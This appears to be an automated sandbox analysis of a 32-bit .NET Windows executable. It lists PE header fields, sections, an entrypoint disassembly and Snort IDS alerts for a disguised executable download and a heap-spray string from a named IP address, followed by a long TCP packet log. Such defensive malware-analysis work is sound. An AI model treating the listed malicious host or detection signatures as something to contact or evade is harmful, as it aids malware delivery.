                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x633ABE12 [Mon Oct 3 10:48:50 2022 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2f100x4b.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x600.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x20000xf640x1000False0.563720703125data5.340869146420705IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0x40000x6000x600False0.40625data4.463923972069048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0x60000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                            RT_VERSION0x40a00x304data
                                                                                                                            RT_MANIFEST0x43a40x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                            Network Behavior

                                                                                                                            Snort IDS Alerts

                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                            144.76.120.25192.168.2.3443496982022640 10/03/22-16:01:58.201313TCP2022640ET TROJAN PE EXE or DLL Windows file download Text M244349698144.76.120.25192.168.2.3
                                                                                                                            144.76.120.25192.168.2.3443497022022640 10/03/22-16:03:31.618225TCP2022640ET TROJAN PE EXE or DLL Windows file download Text M244349702144.76.120.25192.168.2.3
                                                                                                                            144.76.120.25192.168.2.3443496982017962 10/03/22-16:01:58.201313TCP2017962ET TROJAN PE EXE or DLL Windows file download disguised as ASCII44349698144.76.120.25192.168.2.3
                                                                                                                            144.76.120.25192.168.2.3443497022012252 10/03/22-16:03:32.840377TCP2012252ET SHELLCODE Common 0a0a0a0a Heap Spray String44349702144.76.120.25192.168.2.3
                                                                                                                            144.76.120.25192.168.2.3443496982012252 10/03/22-16:01:59.246844TCP2012252ET SHELLCODE Common 0a0a0a0a Heap Spray String44349698144.76.120.25192.168.2.3
                                                                                                                            144.76.120.25192.168.2.3443497022017962 10/03/22-16:03:31.618225TCP2017962ET TROJAN PE EXE or DLL Windows file download disguised as ASCII44349702144.76.120.25192.168.2.3

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Oct 3, 2022 16:01:57.533406973 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:57.533473015 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:57.533576965 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:57.572675943 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:57.572745085 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:57.672245026 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:57.672382116 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:57.681097031 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:57.681159973 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:57.681798935 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:57.731589079 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.152422905 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.152503014 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201409101 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201477051 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201493979 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201561928 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.201605082 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201622009 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.201646090 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201705933 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.201720953 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201816082 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201862097 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201874971 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.201889992 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.201926947 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.224675894 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.224729061 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.224803925 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.224838972 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.224859953 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.224972010 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.225018978 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.225050926 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.225066900 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.225109100 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.225146055 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.225183964 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.225236893 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.225255013 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.225269079 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.248562098 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.248630047 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.248683929 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.248723030 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.248740911 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.248975039 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.249022007 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.249078035 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.249104023 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.249119043 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.249574900 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.249624968 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.249667883 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.249686003 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.249718904 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.250075102 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.250116110 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.250164986 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.250181913 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.250197887 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.250724077 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.250782967 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.250818968 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.250842094 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.250874043 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.251306057 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.251347065 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.251425028 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.251447916 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.251462936 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.274785995 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.274851084 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.274954081 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.274986982 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275019884 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.275047064 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275084972 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275109053 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.275120974 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275142908 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.275234938 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275280952 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275299072 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.275314093 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275347948 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.275433064 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275475025 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275500059 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.275518894 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275533915 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.275904894 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275964975 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.275998116 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.276020050 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.276035070 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.276130915 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.276168108 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.276196003 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.276211023 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.276233912 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.276288986 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.276335001 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.276349068 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.276364088 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.276402950 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.325356960 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.379847050 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.379890919 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380007029 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380048990 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380085945 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380101919 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380114079 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380131960 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380160093 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380181074 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380218029 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380232096 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380285978 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380425930 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380465984 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380551100 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380568027 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380587101 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380621910 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380719900 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380764961 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380810022 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380831003 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.380855083 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.380918026 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381027937 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381061077 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381105900 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381125927 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381151915 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381170988 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381511927 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381560087 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381603956 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381630898 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381658077 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381676912 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381771088 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381804943 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381844044 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381863117 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381886959 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381915092 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.381953001 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.381985903 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382024050 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382045984 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382066965 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382088900 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382127047 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382160902 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382200003 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382222891 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382245064 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382263899 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382318974 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382353067 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382389069 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382436991 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382457018 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382482052 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382500887 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382540941 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382575035 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382613897 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382633924 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.382651091 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.382692099 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.383296013 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.429913044 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.429940939 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430068016 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430109024 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430147886 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430186033 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430308104 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430350065 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430422068 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430447102 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430480003 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430506945 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430545092 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430577993 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430632114 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430655003 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430685997 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430712938 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430773020 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430807114 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430867910 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430919886 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.430968046 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.430969000 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.431018114 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.431050062 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.431103945 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.431123972 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.431152105 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.431174994 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.431221962 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.431252003 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.431304932 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.431320906 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.431379080 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.431379080 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.431428909 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.431476116 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.431516886 CEST49698443192.168.2.3144.76.120.25
                                                                                                                            Oct 3, 2022 16:01:58.431541920 CEST44349698144.76.120.25192.168.2.3
                                                                                                                            Oct 3, 2022 16:01:58.431576967 CEST49698443192.168.2.3144.76.120.25
